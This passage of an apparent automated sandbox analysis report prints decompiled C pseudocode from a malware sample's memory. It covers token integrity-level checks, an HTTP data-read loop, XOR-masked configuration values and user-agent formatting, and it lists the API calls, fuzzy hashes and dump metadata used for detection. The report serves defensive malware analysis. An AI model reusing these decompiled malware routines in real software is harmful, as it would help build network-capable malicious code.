                                                                                                                                                                                                                                											_t76 = E736D71C6( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
                                                                                                                                                                                                                                											 *(_t82 - 0x1c) = _t76;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									} else {
                                                                                                                                                                                                                                										__eflags = _t72 - 3;
                                                                                                                                                                                                                                										if(_t72 == 3) {
                                                                                                                                                                                                                                											goto L19;
                                                                                                                                                                                                                                										}
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							 *(_t82 - 4) = 0xfffffffe;
                                                                                                                                                                                                                                							_t40 = _t76;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							__eflags =  *0x736ef120 - _t72; // 0x1
                                                                                                                                                                                                                                							if(__eflags > 0) {
                                                                                                                                                                                                                                								goto L9;
                                                                                                                                                                                                                                							} else {
					_t40 = 0;
				}
			}
			 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
			return _t40;
		} else {
			E736D751E(__ebx, _t61, 1, __esi);
			E736D73DA();
			E736D783C();
			 *0x736ef460 =  *0x736ef460 & 0x00000000;
			 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
			E736D70A0();
			_t54 = E736D76BF( *((intOrPtr*)(_t82 + 8)), 0);
			asm("sbb esi, esi");
			_t80 =  ~(_t54 & 0x000000ff) & 1;
			__eflags = _t80;
			 *(_t82 - 0x1c) = _t80;
			 *(_t82 - 4) = 0xfffffffe;
			E736D70AD();
			_t56 = _t80;
			goto L4;
		}
	} else {
		_t56 = 0;
		L4:
		 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
		return _t56;
	}
}

















                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 736D7052
                                                                                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 736D706C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2442719207-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                			E00A859B4(long* _a4) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                                				void _v16;
                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                				int _t33;
                                                                                                                                                                                                                                				void* _t46;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_v16 = 1;
                                                                                                                                                                                                                                				_v20 = 0x2000;
                                                                                                                                                                                                                                				if( *0xa8d294 > 5) {
                                                                                                                                                                                                                                					_v16 = 0;
                                                                                                                                                                                                                                					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                                						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                                						_v8 = 0;
                                                                                                                                                                                                                                						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                						if(_v8 != 0) {
                                                                                                                                                                                                                                							_t46 = E00A85157(_v8);
                                                                                                                                                                                                                                							if(_t46 != 0) {
                                                                                                                                                                                                                                								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                                								if(_t33 != 0) {
                                                                                                                                                                                                                                									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								E00A853BB(_t46);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						CloseHandle(_v12);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				 *_a4 = _v20;
                                                                                                                                                                                                                                				return _v16;
                                                                                                                                                                                                                                			}










                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00A859E6
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00A85A06
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00A85A16
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00A85A66
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00A85A39
                                                                                                                                                                                                                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00A85A41
                                                                                                                                                                                                                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00A85A51
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1295030180-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 61%
                                                                                                                                                                                                                                			E00A8202A(void* __eax) {
                                                                                                                                                                                                                                				long _v8;
                                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				char* _t40;
                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                				void* _t44;
                                                                                                                                                                                                                                				intOrPtr _t45;
                                                                                                                                                                                                                                				intOrPtr* _t46;
                                                                                                                                                                                                                                				char _t48;
                                                                                                                                                                                                                                				long _t52;
                                                                                                                                                                                                                                				char* _t53;
                                                                                                                                                                                                                                				long _t54;
                                                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                                                				void* _t64;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t64 = __eax;
                                                                                                                                                                                                                                				_t40 =  &_v12;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v16 = 0;
                                                                                                                                                                                                                                				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40); // executed
                                                                                                                                                                                                                                				if(_t40 == 0) {
                                                                                                                                                                                                                                					_t41 = GetLastError();
                                                                                                                                                                                                                                					_v8 = _t41;
                                                                                                                                                                                                                                					if(_t41 != 0x2efe) {
                                                                                                                                                                                                                                						L26:
                                                                                                                                                                                                                                						return _v8;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v8 = 0;
                                                                                                                                                                                                                                					L25:
                                                                                                                                                                                                                                					 *((intOrPtr*)(_t64 + 0x30)) = 0;
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				if(_v12 == 0) {
                                                                                                                                                                                                                                					goto L25;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t44 =  *0xa8d130(0, 1,  &_v24); // executed
                                                                                                                                                                                                                                				if(_t44 != 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t45 = E00A85157(0x1000);
                                                                                                                                                                                                                                				_v20 = _t45;
                                                                                                                                                                                                                                				if(_t45 == 0) {
                                                                                                                                                                                                                                					_v8 = 8;
                                                                                                                                                                                                                                					L21:
                                                                                                                                                                                                                                					_t46 = _v24;
                                                                                                                                                                                                                                					 *((intOrPtr*)( *_t46 + 8))(_t46);
                                                                                                                                                                                                                                					goto L26;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                                                						L4:
                                                                                                                                                                                                                                						_t48 = _v12;
                                                                                                                                                                                                                                						if(_t48 >= 0x1000) {
                                                                                                                                                                                                                                							_t48 = 0x1000;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
                                                                                                                                                                                                                                						if(_t48 == 0) {
                                                                                                                                                                                                                                							break;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t55 = _v24;
                                                                                                                                                                                                                                						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
                                                                                                                                                                                                                                						_t17 =  &_v12;
                                                                                                                                                                                                                                						 *_t17 = _v12 - _v16;
                                                                                                                                                                                                                                						if( *_t17 != 0) {
                                                                                                                                                                                                                                							continue;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						L10:
                                                                                                                                                                                                                                						if(WaitForSingleObject( *0xa8d2a4, 0) != 0x102) {
                                                                                                                                                                                                                                							_v8 = 0x102;
                                                                                                                                                                                                                                							L18:
                                                                                                                                                                                                                                							E00A853BB(_v20);
                                                                                                                                                                                                                                							if(_v8 == 0) {
                                                                                                                                                                                                                                								_t52 = E00A850DE(_v24, _t64); // executed
                                                                                                                                                                                                                                								_v8 = _t52;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L21;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t53 =  &_v12;
                                                                                                                                                                                                                                						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
                                                                                                                                                                                                                                						if(_t53 != 0) {
                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t54 = GetLastError();
                                                                                                                                                                                                                                						_v8 = _t54;
                                                                                                                                                                                                                                						if(_t54 != 0x2f78 || _v12 != 0) {
                                                                                                                                                                                                                                							goto L18;
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							_v8 = 0;
                                                                                                                                                                                                                                							goto L15;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_v8 = GetLastError();
                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                					L15:
                                                                                                                                                                                                                                				} while (_v12 != 0);
                                                                                                                                                                                                                                				goto L18;
                                                                                                                                                                                                                                			}




















                                                                                                                                                                                                                                0x00a82111
                                                                                                                                                                                                                                0x00a82114
                                                                                                                                                                                                                                0x00a82117
                                                                                                                                                                                                                                0x00a8211f
                                                                                                                                                                                                                                0x00a82125
                                                                                                                                                                                                                                0x00a8212a
                                                                                                                                                                                                                                0x00a8212a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8211f
                                                                                                                                                                                                                                0x00a820dd
                                                                                                                                                                                                                                0x00a820e4
                                                                                                                                                                                                                                0x00a820ec
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a820ee
                                                                                                                                                                                                                                0x00a820f4
                                                                                                                                                                                                                                0x00a820fc
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82103
                                                                                                                                                                                                                                0x00a82103
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82103
                                                                                                                                                                                                                                0x00a820fc
                                                                                                                                                                                                                                0x00a820c4
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a82106
                                                                                                                                                                                                                                0x00a82106
                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A8214A
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A820BE
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000), ref: 00A820CE
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A820EE
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLast$AllocateHeapObjectSingleWait
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 35602742-1701360479
                                                                                                                                                                                                                                • Opcode ID: c4b30c1d64f9a3e644e688a2d1df5a670d79abed861bd072db985dc76e3b458f
                                                                                                                                                                                                                                • Instruction ID: 1d83d7333d8e381500718d89ad9d43f5ab22cbdadd7d3a9a17d8bc941050fdb9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4b30c1d64f9a3e644e688a2d1df5a670d79abed861bd072db985dc76e3b458f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3141B2B1D00209EFDF20EFA4DD88ABEBBB9FB04745F204569E602E6250D6309E45DB61
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                                                			E00A845CF(void** __esi) {
                                                                                                                                                                                                                                				intOrPtr _v0;
                                                                                                                                                                                                                                				intOrPtr _t4;
                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                				void* _t9;
                                                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                                                				void* _t11;
                                                                                                                                                                                                                                				void** _t13;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t13 = __esi;
                                                                                                                                                                                                                                				_t4 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                				__imp__(_t4 + 0x40);
                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                					_t6 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                					_t1 = _t6 + 0x58; // 0x0
                                                                                                                                                                                                                                					if( *_t1 == 0) {
                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					Sleep(0xa);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t8 =  *_t13;
                                                                                                                                                                                                                                				if(_t8 != 0 && _t8 != 0xa8d030) {
                                                                                                                                                                                                                                					HeapFree( *0xa8d270, 0, _t8);
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t9 = E00A85341(_v0, _t13); // executed
                                                                                                                                                                                                                                				_t13[1] = _t9;
                                                                                                                                                                                                                                				_t10 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                				_t11 = _t10 + 0x40;
                                                                                                                                                                                                                                				__imp__(_t11);
                                                                                                                                                                                                                                				return _t11;
                                                                                                                                                                                                                                			}












                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RtlEnterCriticalSection.NTDLL(01AE9570), ref: 00A845D8
                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A,?,00A85884), ref: 00A845E2
                                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,?,00A85884), ref: 00A8460A
                                                                                                                                                                                                                                • RtlLeaveCriticalSection.NTDLL(01AE9570), ref: 00A84626
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                • String ID: Uxt
                                                                                                                                                                                                                                • API String ID: 58946197-1536154274
                                                                                                                                                                                                                                • Opcode ID: 715eb11b8cd9a5ff2720f6423934e28efb9bc88b6afcf7c370aae08400095f6c
                                                                                                                                                                                                                                • Instruction ID: f36d7352ffa1e43aab6776a192a3a849cf0e49a4a59531a2e012da104bdea054
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 715eb11b8cd9a5ff2720f6423934e28efb9bc88b6afcf7c370aae08400095f6c
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3F0D470A04241DBDB25EFA9EE48F1A3BB4FB15790B044415F542CB6A1E730E952DB25
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 57%
                                                                                                                                                                                                                                			E00A85701(signed int __edx) {
                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                				long _v12;
                                                                                                                                                                                                                                				CHAR* _v16;
                                                                                                                                                                                                                                				long _v20;
                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                				void* _t21;
                                                                                                                                                                                                                                				CHAR* _t22;
                                                                                                                                                                                                                                				CHAR* _t25;
                                                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				void* _t31;
                                                                                                                                                                                                                                				void* _t32;
                                                                                                                                                                                                                                				CHAR* _t36;
                                                                                                                                                                                                                                				CHAR* _t42;
                                                                                                                                                                                                                                				CHAR* _t43;
                                                                                                                                                                                                                                				CHAR* _t44;
                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                                                				CHAR* _t54;
                                                                                                                                                                                                                                				signed char _t56;
                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                                                				void* _t62;
                                                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                                                				CHAR* _t66;
                                                                                                                                                                                                                                				char* _t67;
                                                                                                                                                                                                                                				void* _t68;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t61 = __edx;
                                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                                				_v8 = 0;
                                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                                				_t21 = E00A82CC9();
                                                                                                                                                                                                                                				if(_t21 != 0) {
                                                                                                                                                                                                                                					_t59 =  *0xa8d294; // 0x2000000a
                                                                                                                                                                                                                                					_t55 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                					 *0xa8d294 = (_t59 & 0xf0000000) + _t21;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                				_t22 =  *0xa8d12c(0, 2); // executed
                                                                                                                                                                                                                                				_v16 = _t22;
                                                                                                                                                                                                                                				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                                                                                                                                                                                                					_t25 = E00A82A45( &_v8,  &_v20); // executed
                                                                                                                                                                                                                                					_t54 = _t25;
                                                                                                                                                                                                                                					_t26 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                					if( *0xa8d294 > 5) {
                                                                                                                                                                                                                                						_t8 = _t26 + 0xa8e5cd; // 0x4d283a53
                                                                                                                                                                                                                                						_t27 = _t8;
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t7 = _t26 + 0xa8e9f9; // 0x44283a44
                                                                                                                                                                                                                                						_t27 = _t7;
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					E00A8276B(_t27, _t27);
                                                                                                                                                                                                                                					_t31 = E00A81DF5(_t61,  &_v20,  &_v12); // executed
                                                                                                                                                                                                                                					if(_t31 == 0) {
                                                                                                                                                                                                                                						CloseHandle(_v20);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					_t62 = 5;
                                                                                                                                                                                                                                					if(_t54 != _t62) {
                                                                                                                                                                                                                                						 *0xa8d2a8 =  *0xa8d2a8 ^ 0x81bbe65d;
                                                                                                                                                                                                                                						_t32 = E00A85157(0x60);
                                                                                                                                                                                                                                						 *0xa8d364 = _t32;
                                                                                                                                                                                                                                						__eflags = _t32;
                                                                                                                                                                                                                                						if(_t32 == 0) {
                                                                                                                                                                                                                                							_push(8);
                                                                                                                                                                                                                                							_pop(0);
                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                							memset(_t32, 0, 0x60);
                                                                                                                                                                                                                                							_t49 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                							_t68 = _t68 + 0xc;
                                                                                                                                                                                                                                							__imp__(_t49 + 0x40);
                                                                                                                                                                                                                                							_t51 =  *0xa8d364; // 0x1ae95b0
                                                                                                                                                                                                                                							 *_t51 = 0xa8e823;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t54 = 0;
                                                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                                                						if(0 == 0) {
                                                                                                                                                                                                                                							_t36 = RtlAllocateHeap( *0xa8d270, 0, 0x43);
                                                                                                                                                                                                                                							 *0xa8d300 = _t36;
                                                                                                                                                                                                                                							__eflags = _t36;
                                                                                                                                                                                                                                							if(_t36 == 0) {
                                                                                                                                                                                                                                								_push(8);
                                                                                                                                                                                                                                								_pop(0);
                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                								_t56 =  *0xa8d294; // 0x2000000a
                                                                                                                                                                                                                                								_t61 = _t56 & 0x000000ff;
                                                                                                                                                                                                                                								_t58 =  *0xa8d2e0; // 0x105a5a8
                                                                                                                                                                                                                                								_t13 = _t58 + 0xa8e55a; // 0x697a6f4d
                                                                                                                                                                                                                                								_t55 = _t13;
                                                                                                                                                                                                                                								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xa8c2a7);
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							_t54 = 0;
                                                                                                                                                                                                                                							__eflags = 0;
                                                                                                                                                                                                                                							if(0 == 0) {
                                                                                                                                                                                                                                								asm("sbb eax, eax");
                                                                                                                                                                                                                                								E00A89DE1( ~_v8 &  *0xa8d2a8, 0xa8d00c); // executed
                                                                                                                                                                                                                                								_t42 = E00A8235B(_t55); // executed
                                                                                                                                                                                                                                								_t54 = _t42;
                                                                                                                                                                                                                                								__eflags = _t54;
                                                                                                                                                                                                                                								if(_t54 != 0) {
                                                                                                                                                                                                                                									goto L30;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t43 = E00A86EDD(); // executed
                                                                                                                                                                                                                                								__eflags = _t43;
                                                                                                                                                                                                                                								if(_t43 != 0) {
                                                                                                                                                                                                                                									__eflags = _v8;
                                                                                                                                                                                                                                									_t65 = _v12;
                                                                                                                                                                                                                                									if(_v8 != 0) {
                                                                                                                                                                                                                                										L29:
                                                                                                                                                                                                                                										_t44 = E00A89FF2(_t61, _t65, _v8); // executed
                                                                                                                                                                                                                                										_t54 = _t44;
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									__eflags = _t65;
                                                                                                                                                                                                                                									if(__eflags == 0) {
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									_t54 = E00A8A23E(__eflags,  &(_t65[4]));
                                                                                                                                                                                                                                									__eflags = _t54;
                                                                                                                                                                                                                                									if(_t54 == 0) {
                                                                                                                                                                                                                                										goto L30;
                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                									goto L29;
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								_t54 = 8;
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                						_t66 = _v12;
                                                                                                                                                                                                                                						if(_t66 == 0) {
                                                                                                                                                                                                                                							L30:
                                                                                                                                                                                                                                							if(_v16 == 0 || _v16 == 1) {
                                                                                                                                                                                                                                								 *0xa8d128();
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                							goto L34;
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                						_t67 =  &(_t66[4]);
                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                						} while (E00A86ABB(_t62, _t67, 0, 1) == 0x4c7);
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L30;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					_t54 = _t22;
                                                                                                                                                                                                                                					L34:
                                                                                                                                                                                                                                					return _t54;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                			}































                                                                                                                                                                                                                                0x00a858db

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A82CC9: GetModuleHandleA.KERNEL32(4C44544E,00000000,00A8571A,00000000,00000000), ref: 00A82CD8
                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 00A85797
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • memset.NTDLL ref: 00A857E6
                                                                                                                                                                                                                                • RtlInitializeCriticalSection.NTDLL(01AE9570), ref: 00A857F7
                                                                                                                                                                                                                                  • Part of subcall function 00A8A23E: memset.NTDLL ref: 00A8A253
                                                                                                                                                                                                                                  • Part of subcall function 00A8A23E: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 00A8A295
                                                                                                                                                                                                                                  • Part of subcall function 00A8A23E: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 00A8A2A0
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 00A85822
                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 00A85852
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4246211962-0
                                                                                                                                                                                                                                • Opcode ID: 65370111fe859a40434f26d719449113e1fadb3b2d0a7d4317e62b93fad7d944
                                                                                                                                                                                                                                • Instruction ID: d3c8ac3dbcbb266f782fd804f213659fcb4cbea95222ac2a2a23bd682cb699ae
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 65370111fe859a40434f26d719449113e1fadb3b2d0a7d4317e62b93fad7d944
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3851F171E01A24EBEB20FBF0DD89FAE77B8AB04710F144826F902E7191E77099029B51
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 22%
